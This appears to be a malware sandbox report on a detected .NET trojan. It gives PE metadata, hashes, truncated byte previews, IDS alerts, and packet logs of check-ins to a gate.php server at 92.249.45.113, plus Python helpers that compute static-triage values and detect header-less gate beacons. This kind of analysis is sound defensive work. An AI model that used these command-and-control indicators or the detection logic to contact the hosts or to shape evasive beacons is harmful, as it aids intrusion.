                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................D...6.......c... ........@.. ....................................`..................................b..K........1........................................................................... ............... ..H............text....C... ...D.................. ..`.sdata..8............H..............@....rsrc....1.......2...J..............@..@.reloc...............|..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):407776
                                                                                                                                        Entropy (8bit):6.080910017085125
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6144:/+BWmtpZQYS2PjCLfjSCpkALDUbr0tJ0nzbWk:WPw2PjCLe3a6Q70zbR
                                                                                                                                        MD5:F75FE8D06448D07720D5456F2A327F08
                                                                                                                                        SHA1:DBA5D60848A7C24CE837225709D9E23690BB5CB3
                                                                                                                                        SHA-256:977998AEC486395EABA6CE5661648425A1A181CE18C2C87C6288AF62B87D5ECA
                                                                                                                                        SHA-512:EB05696F92881A698B7DEF0F8852286212A5EB235A2FF8A41460DEDBC6AE1964BFBEF613D3BEC736DF66525BF6E5A6C95FF5E0A71C904FA70B5C6675E2275A34
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:Q.P...........!..................... ... ....... .......................`............@.................................\...O.... ..0................>...@......$................................................ ............... ..H............text........ ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B........................H.......`e..............c..X...P .......................................R..p..4j../ux..;....B.6z.R...K.KT....i.r.p>.m~.p.?YQ.~16~v....J.h.}..k.......&...E....p..Ix..t;.uT7Ph..(.Rv:...y..qp...dX3...bu..{....*"..}....*V.(i.....(......}....*2.{....oj...*2.{....ok...*B..(....&..(....*...0...........oj........YE....{...............{...f...............f.......A...A...A...A...1...A...V...8<....t......{.....om...ol....or.....+U..om.....{.....o....oj...on.....o....o{...t.....o....o}.
                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Entropy (8bit):5.986542010585417
                                                                                                                                        TrID:
                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.64%
                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                        • InstallShield setup (43055/19) 0.21%
                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                        File name:5VXh2VBmA0.exe
                                                                                                                                        File size:549415
                                                                                                                                        MD5:7a483865f3f1999ab24ed75f710649ad
                                                                                                                                        SHA1:b149c60bbc7f1781e76079210da29a55d0b137a3
                                                                                                                                        SHA256:536ac35ca8f6e6ddf85737ad4cabd5631542613ffec3c9b03947aaa2cdc0dcaf
                                                                                                                                        SHA512:7bd126e0112c8b4b284c2e2ab6d3f081cdb169769847508b4b92a443e019164c9c75ed8ab2465b2db6203736f45df8a3556b2e14ef3f60cbaa2fda97dda7686b
                                                                                                                                        SSDEEP:6144:X+BWmtpZQYS2PjCLfjSCpkALDUbr0tJ0nzbWdG/Wow7+JJUK:OPw2PjCLe3a6Q70zbYow60K
                                                                                                                                        TLSH:43C46A0223FC4BA5E5FE2B31A631424543F6FD46657AE70D0D80E6EA4C777829E203A7
                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u.a.....................@.......=... ...@....@.. ....................................@................................
Icon Hash: 41455554545445a2
Entrypoint: 0x483dee
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x618475C5 [Fri Nov 5 00:07:33 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction (disassembly at the entry point, 0x483dee)
jmp dword ptr [00402000h]
(followed by 97 x "add byte ptr [eax], al", which is how the disassembler renders the 00 00 padding bytes after the end of .text)

The single jmp is the whole native entry stub: 0x402000 is the IAT (IMAGE_DIRECTORY_ENTRY_IAT at RVA 0x2000, size 8), whose only slot is mscoree.dll!_CorExeMain, and the 6-byte instruction ends exactly at the .text virtual-size boundary (0x2000 + 0x81df4 = 0x83df4). This is the standard stub of a .NET executable; the behaviour of the sample lives in the managed code reached through _CorExeMain, not in this native code.
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x83d98          0x53          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x86000          0x3b58        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x8a000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x84000          0x1c          .sdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy  Characteristics
.text   0x2000           0x81df4       0x81e00   False     0.3960           data       6.0077   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata  0x84000          0x138         0x200     False     0.2422           data       2.1997   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x86000          0x3b58        0x3c00    False     0.1406           data       4.2375   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x8a000          0xc           0x200     False     0.0449           data       0.1019   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type
RT_ICON        0x86540  0x2e8   Device independent bitmap graphic, 32 x 64 x 4, image size 512
RT_ICON        0x86828  0x128   Device independent bitmap graphic, 16 x 32 x 4, image size 128
RT_ICON        0x86950  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
RT_ICON        0x871f8  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors
RT_ICON        0x87760  0x353   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON        0x87ab8  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4224
RT_ICON        0x88b60  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 1088
RT_GROUP_ICON  0x88fc8  0x68    data
RT_VERSION     0x86250  0x2f0   SysEx File - IDP
RT_MANIFEST    0x89030  0xb22   XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
(The Language and Country columns are empty for every resource.)
DLL          Import
mscoree.dll  _CorExeMain
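The three derived values in the tables above (Import Hash, section Entropy and the decoded Time Stamp) can be recomputed from first principles. The helpers below are an added example, not Joe Sandbox code; the import list and the data-directory entries are constructed from the tables on this page, and the entropy inputs are synthetic byte strings. The point a triager needs: a .NET executable imports nothing but mscoree.dll!_CorExeMain, so every such file hashes to the same import hash, and the value is useless for pivoting to related samples.

```python
"""Static-triage helpers for the PE facts in this report (added example,
not the sandbox's own code). Reproduces the import hash, per-section
Shannon entropy and the decoded TimeDateStamp. All inputs are constructed."""
import hashlib
import math
from collections import Counter
from datetime import datetime, timezone

# Module extensions the import-hash algorithm strips before hashing.
_STRIPPED = (".dll", ".ocx", ".sys")


def imphash(imports):
    """Mandiant-style import hash over an ordered list of (dll, function).

    Each entry becomes "module.function" (lower-cased, extension dropped);
    the entries are joined with commas in import-table order and MD5'd.
    """
    parts = []
    for dll, func in imports:
        dll = dll.lower()
        for ext in _STRIPPED:
            if dll.endswith(ext):
                dll = dll[: -len(ext)]
                break
        parts.append(f"{dll}.{func.lower()}")
    return hashlib.md5(",".join(parts).encode()).hexdigest()


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_timestamp(stamp):
    """Render IMAGE_FILE_HEADER.TimeDateStamp (seconds since epoch) in UTC."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def is_managed(data_directories):
    """True when IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR is populated, i.e. the
    file carries a CLR header and its native entry stub only forwards to
    mscoree!_CorExeMain."""
    rva, size = data_directories.get("IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", (0, 0))
    return rva != 0 and size != 0


# Constructed inputs mirroring this report's import and directory tables.
SAMPLE_IMPORTS = [("mscoree.dll", "_CorExeMain")]
SAMPLE_DIRECTORIES = {
    "IMAGE_DIRECTORY_ENTRY_IAT": (0x2000, 0x8),
    "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR": (0x2008, 0x48),
}

if __name__ == "__main__":
    print("imphash :", imphash(SAMPLE_IMPORTS))
    print("managed :", is_managed(SAMPLE_DIRECTORIES))
    print("stamp   :", pe_timestamp(0x618475C5))
    print("entropy :", shannon_entropy(bytes(range(256))), shannon_entropy(b"\x00" * 512))
```

Because `is_managed` is true here, cluster this sample on what differs between .NET files (resources, strings, TypeRef/MemberRef names, the dropped payload) rather than on the import hash, which every managed executable shares.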
Timestamp                 Protocol  SID      Message                                               Source Port  Dest Port  Source IP    Dest IP
01/23/23-21:25:23.289815  TCP       2022818  ET TROJAN Generic gate .php GET with minimal headers  49707        80         192.168.2.3  92.249.45.113
01/23/23-21:25:29.484357  TCP       2022818  ET TROJAN Generic gate .php GET with minimal headers  49708        80         192.168.2.3  92.249.45.113
01/23/23-21:25:39.311255  TCP       2022818  ET TROJAN Generic gate .php GET with minimal headers  49712        80         192.168.2.3  92.249.45.113
01/23/23-21:25:47.864338  TCP       2022818  ET TROJAN Generic gate .php GET with minimal headers  49715        80         192.168.2.3  92.249.45.113
01/23/23-21:25:59.271301  TCP       2022818  ET TROJAN Generic gate .php GET with minimal headers  49718        80         192.168.2.3  92.249.45.113
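The five alerts above all fire on the same pattern: a GET to a gate .php check-in URL sent with a bare header set. The code below is an added example, not the Emerging Threats rule body for SID 2022818 (which is not reproduced on this page); it approximates that logic as a request checker that fires on a GET to a gate*.php path without a User-Agent header, and it turns the alert timestamps above into check-in intervals. The HTTP requests are constructed; only the timestamps come from the table.

```python
"""Added example, not the ET rule: flag gate.php check-ins that lack the
headers a browser or mainstream HTTP library always sends, and measure the
spacing between the check-ins the sandbox's IDS logged."""
import re
from datetime import datetime

# A path whose last component looks like "<something>gate<something>.php".
_GATE_PATH = re.compile(r"/[^/]*gate[^/]*\.php$", re.IGNORECASE)


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers)."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_gate_checkin(raw):
    """True for a GET to a gate*.php URL that carries no User-Agent header."""
    method, path, headers = parse_request(raw)
    if method != "GET":
        return False
    if not _GATE_PATH.search(path.split("?", 1)[0]):
        return False
    return "user-agent" not in headers


def checkin_intervals_ms(timestamps, fmt="%m/%d/%y-%H:%M:%S.%f"):
    """Milliseconds between consecutive alerts, after sorting by time."""
    times = sorted(datetime.strptime(t, fmt) for t in timestamps)
    return [round((b - a).total_seconds() * 1000) for a, b in zip(times, times[1:])]


# Constructed requests. The Host is the alert's destination IP; the path and
# query string are invented for the example.
MALICIOUS_REQUEST = (
    "GET /gate.php?id=constructed-example HTTP/1.1\r\n"
    "Host: 92.249.45.113\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /gate.php?id=constructed-example HTTP/1.1\r\n"
    "Host: 92.249.45.113\r\n"
    "User-Agent: Mozilla/5.0 (constructed)\r\n"
    "Accept: */*\r\n"
    "\r\n"
)
OTHER_REQUEST = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: 92.249.45.113\r\n"
    "\r\n"
)

# Alert timestamps copied from the Snort table above.
ALERT_TIMES = [
    "01/23/23-21:25:29.484357",
    "01/23/23-21:25:23.289815",
    "01/23/23-21:25:39.311255",
    "01/23/23-21:25:47.864338",
    "01/23/23-21:25:59.271301",
]

if __name__ == "__main__":
    for name, req in [("malicious", MALICIOUS_REQUEST), ("benign", BENIGN_REQUEST), ("other", OTHER_REQUEST)]:
        print(f"{name:10} gate check-in: {is_gate_checkin(req)}")
    print("intervals (ms):", checkin_intervals_ms(ALERT_TIMES))
```

The intervals for this run are roughly 6 to 11 seconds, so the check-in cadence is short and jittered; a beacon detector keyed on a fixed period would miss it, while the missing User-Agent is a stable property of the client and a better hunt pivot.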
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Jan 23, 2023 21:24:58.911417961 CET  49702        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:24:58.943480015 CET  80           49702      208.95.112.1   192.168.2.3
Jan 23, 2023 21:24:58.943727970 CET  49702        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:24:58.945521116 CET  49702        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:24:58.979034901 CET  80           49702      208.95.112.1   192.168.2.3
Jan 23, 2023 21:24:59.031476974 CET  49702        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:08.396599054 CET  49702        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:08.429296017 CET  80           49702      208.95.112.1   192.168.2.3
Jan 23, 2023 21:25:08.429421902 CET  49702        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:08.465034962 CET  49703        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:08.497371912 CET  80           49703      208.95.112.1   192.168.2.3
Jan 23, 2023 21:25:08.497500896 CET  49703        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:08.497775078 CET  49703        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:08.532289028 CET  80           49703      208.95.112.1   192.168.2.3
Jan 23, 2023 21:25:08.551992893 CET  49703        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:08.584162951 CET  80           49703      208.95.112.1   192.168.2.3
Jan 23, 2023 21:25:08.584237099 CET  49703        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:11.571495056 CET  49704        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:11.603656054 CET  80           49704      208.95.112.1   192.168.2.3
Jan 23, 2023 21:25:11.603861094 CET  49704        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:11.630594015 CET  49704        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:11.664326906 CET  80           49704      208.95.112.1   192.168.2.3
Jan 23, 2023 21:25:11.782521009 CET  49704        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:22.240396976 CET  49705        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:22.272439957 CET  80           49705      208.95.112.1   192.168.2.3
Jan 23, 2023 21:25:22.272852898 CET  49705        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:22.278419018 CET  49705        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:22.312055111 CET  80           49705      208.95.112.1   192.168.2.3
Jan 23, 2023 21:25:22.361565113 CET  49705        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:22.873239040 CET  49706        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:22.905823946 CET  80           49706      208.95.112.1   192.168.2.3
Jan 23, 2023 21:25:22.906618118 CET  49706        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:22.916079998 CET  49706        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:22.949666977 CET  80           49706      208.95.112.1   192.168.2.3
Jan 23, 2023 21:25:23.033792973 CET  49706        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:23.066507101 CET  49704        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:23.098547935 CET  80           49704      208.95.112.1   192.168.2.3
Jan 23, 2023 21:25:23.098670959 CET  49704        80         192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:23.156616926 CET  49707        80         192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:23.289489031 CET  80           49707      92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:23.289617062 CET  49707        80         192.168.2.3    92.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:23.289814949 CET4970780192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:23.422597885 CET804970792.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:23.524386883 CET804970792.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:23.642919064 CET4970780192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:24.159368038 CET4970780192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:24.292308092 CET804970792.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:24.331115007 CET804970792.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:24.533682108 CET4970780192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:28.384064913 CET804970792.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:28.384248018 CET4970780192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:29.347852945 CET4970780192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:29.348463058 CET4970880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:29.482371092 CET804970792.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:29.483927965 CET804970892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:29.484061003 CET4970880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:29.484357119 CET4970880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:29.620053053 CET804970892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:29.625597000 CET804970892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:29.862272978 CET4970880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:33.569564104 CET804970892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:33.569741964 CET4970880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:33.631716013 CET4970880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:33.735064030 CET4970980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:33.765562057 CET804970892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:33.866054058 CET804970992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:33.866224051 CET4970980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:33.866869926 CET4970980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:33.997765064 CET804970992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:34.095911026 CET804970992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:34.143781900 CET4970980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:34.347161055 CET4971080192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:34.379106998 CET8049710208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:34.379235029 CET4971080192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:34.380011082 CET4971080192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:34.413429976 CET8049710208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:34.534441948 CET4971080192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:36.861052990 CET4970580192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:36.893050909 CET8049705208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:36.893131971 CET4970580192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:36.922358990 CET4971180192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:36.954301119 CET8049711208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:36.954489946 CET4971180192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:36.957734108 CET4971180192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:36.991178036 CET8049711208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:37.050304890 CET4971180192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:37.391151905 CET4971180192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:37.425131083 CET8049711208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:37.550348997 CET4971180192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:38.967911005 CET804970992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:38.967972994 CET4970980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:39.078352928 CET4970680192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:39.099823952 CET4970980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:39.110711098 CET8049706208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:39.112668991 CET4970680192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:39.181319952 CET4971280192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:39.185693026 CET4971380192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:39.215038061 CET8049713208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:39.218374014 CET4971380192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:39.225068092 CET4971380192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:39.230784893 CET804970992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:39.255388975 CET8049713208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:39.310651064 CET804971292.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:39.311069012 CET4971280192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:39.311254978 CET4971280192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:39.347934961 CET4971380192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:39.440323114 CET804971292.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:39.451045036 CET804971292.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:39.534856081 CET4971280192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:41.314549923 CET4971380192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:42.490222931 CET4971280192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:42.659713984 CET804971292.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:42.659754992 CET804971292.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:42.847628117 CET4971280192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:46.367243052 CET804971292.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:46.367320061 CET4971280192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:47.302592039 CET4971180192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:47.676419973 CET4971280192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:47.734384060 CET4971580192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:47.805752039 CET804971292.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:47.863987923 CET804971592.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:47.864128113 CET4971580192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:47.864337921 CET4971580192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:47.993766069 CET804971592.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:47.998567104 CET804971592.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:48.149800062 CET4971580192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:51.969892025 CET804971592.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:51.970092058 CET4971580192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.015397072 CET4971580192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.136583090 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.145040989 CET804971592.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.267484903 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.267765999 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.268623114 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.399266005 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.495882034 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.511815071 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.642554045 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.642586946 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.644560099 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.644714117 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.644793987 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.775521994 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.775631905 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.775672913 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.775759935 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.906958103 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.906992912 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.907011032 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.907457113 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.907891035 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.038537979 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.038611889 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.038726091 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.038795948 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.038901091 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.038907051 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.038954973 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.039011955 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.039021015 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.039058924 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.039073944 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.039215088 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.101974964 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.169851065 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.169887066 CET804971692.249.45.113192.168.2.3
